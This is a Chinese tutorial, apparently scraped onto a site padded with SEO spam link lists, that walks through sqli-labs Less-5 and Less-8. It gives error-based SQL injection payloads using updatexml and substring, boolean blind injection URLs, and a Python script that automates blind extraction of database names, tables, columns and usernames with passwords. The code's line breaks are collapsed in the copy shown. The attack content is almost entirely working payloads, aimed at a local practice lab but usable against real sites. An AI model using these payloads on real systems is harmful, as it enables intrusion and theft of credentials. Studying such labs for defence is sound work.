当前位置: 首页 > news >正文

自己做网站空间厦门专业做优化的公司

自己做网站空间,厦门专业做优化的公司,广东 网站备案,专业网站建设商家sqllabs5:(报错注入) ?id1 回显You are in........... ?id2-1 回显You are in........... ?id1 回显 1 LIMIT 0,1 判断是字符型,闭合。?id1order by 3-- //页面显示正常我们试了4行得出是报错注入 我们先爆库名 http://127.0.0.1/sqli-labs-master/L…

sqllabs5:(报错注入)

?id=1  回显You are in...........
?id=2-1  回显You are in...........
?id=1'  回显'  '1'' LIMIT 0,1  '判断是字符型,'闭合。
?id=1'order by 3--+    //页面显示正常

我们试了4行得出是报错注入

我们先爆库名

http://127.0.0.1/sqli-labs-master/Less-5/?id='and updatexml(1,concat(0x7e,(select database()),0x7e),3)--+

拿下库名:security

爆表名

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)),1)%20--+

拿下表名

然后爆字段:

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1) --+

爆数据:

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)),1) --+

数据不完整,因为updatexml()函数的报错内容不超过32个字符,所以我们还需要对数据进行处理

使用substring()函数对结果字符进行处理

?id=-1' and updatexml(1,concat(0x7e,substring((select group_concat(username,0x7e,password) from users),32,64)),1) --+

之后我们就可以不断改变位置,这样我们就可以得到所有数据,后续的操作不再演示

sqllabs8:布尔盲注

报错注入被注释掉了

联合查询只出现you are in ..........

所以这里我们能看见一真一假(页面特征)

不加'时为真

http://127.0.0.1/sqli-labs-master/Less-8/?id=1

加入'时为假

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'

我们可以用布尔盲注

我们数据库名:

security,s的ascii码是115,我们可以一个一个试一试

http://127.0.0.1/sqli-labs-master/Less-8//?id=1' and ascii(substring((select database()),1,1))=115--+

利用二分法和ASCII码进行渗透:

根据此现象我们写一个python脚本快速进行注入

import time
import requestsurl = 'http://127.0.0.1/sqli-labs-master/Less-8/index.php'def inject_database(url):name = ''for i in range(1, 50):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(), %d, 1)) > %d-- " % (i, mid)res = {"id": payload}# start_time = time.time()r = requests.get(url, params=res)# end_time = time.time()if 'You are in...........' in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database(url)

爆库名;

爆表名:

payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()), %d, 1)) > %d-- " % (i, mid)

爆列名:

payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), %d, 1)) > %d-- " % (i, mid)

爆数据:

payload = "1' and ascii(substr((select group_concat(username,'$',password) from users), %d, 1)) > %d-- " % (i, mid)

http://www.dinnco.com/news/6269.html

相关文章:

  • 长春网站制作招聘信息微信营销工具
  • 用搬瓦工做网站营销方法
  • 做网站的成功案例seo查询 站长工具
  • 视频教学网站开发需求分析bing收录提交
  • 企业网站下载镇海seo关键词优化费用
  • 手表哪个网站最好网站推广找哪家公司好
  • 网站页面链接怎么做的韩国比分预测
  • wordpress get image长春百度seo公司
  • wordpress首页模板文件位置广东网站seo策划
  • 网站怎么做微信分享企业文化宣传策划方案
  • 做网站构思防疫优化措施
  • 公司平台网站建设北京营销推广网站建设
  • 专业网站策划公司seo优化工作怎么样
  • 武夷山网站推广seo网站编辑优化招聘
  • 做网站设计都做些什么营销方案100例
  • 网站建设初期问题常见seo排名软件哪个好用
  • 对企业委托建站公司维护网站的要求营销的目的有哪些
  • wordpress禁止 逍遥培训机构seo
  • 东莞寮步做网站的有吗打开百度一下搜索
  • 哈尔滨营销型网站制作安卓优化大师官方版
  • 沈阳网站哪家做的好网站优化北京seo
  • 响应式网站的制作网站制作搜索引擎营销包括
  • 公司网站 开源千锋教育培训怎么样
  • 苏州专业高端网站建设网络公司百度推广好不好做
  • 做团购网站视频免费个人主页网站
  • 人才网站建设方案怎样做好网络推广呀
  • 微信公众号的字体和wordpressseo厂家电话
  • 长春联通网站备案百度seo课程
  • 三元桥做网站的公司清远疫情防控措施
  • 重庆网站设计网站优化网